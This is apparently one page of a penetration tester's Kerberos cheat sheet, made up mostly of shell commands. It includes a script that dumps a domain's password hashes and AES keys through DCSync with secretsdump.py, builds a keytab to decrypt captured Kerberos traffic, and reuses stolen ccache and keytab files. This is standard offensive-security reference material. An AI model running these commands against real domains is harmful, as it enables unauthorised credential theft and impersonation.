Kerberos

Synchronize Time

Using ntpdate:

$ sudo apt install ntpdate -y
$ sudo ntpdate $DC

Using faketime:

$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date

Decrypt KRB5 Traffic

Build a keytab holding the domain's NT (RC4, etype 23) and AES256 (etype 18) keys from a DCSync dump; the keytab can then be loaded into Wireshark to decrypt captured Kerberos traffic.

keytab.sh
#!/usr/bin/env bash
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out

# --- Build the key tuples (23 = RC4/NT hash, 18 = AES256) and splice them into dirkjanm's keytab.py in place of its sample keys

cat secretsdump.out | grep aad3b435 | awk -F: '{print "    (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print "    (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt

Manual Ticket Injection

Kerberos on Linux

Check KRB5CCNAME environment variable contents:

$ env | grep KRB5

Request TGT supplying password:

$ kinit
$ klist

List available SPNs:

$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "Administrator@MEGACORP.LOCAL" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName

Request TGS for MSSQL service:

$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist

Re-using keytab files to load and renew a TGT:

$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R

Re-using ccache files:

$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCNAME=/tmp/krb5cc_31337
$ klist

FreeIPA

A blog series by @n0pe_sled on attacking FreeIPA:
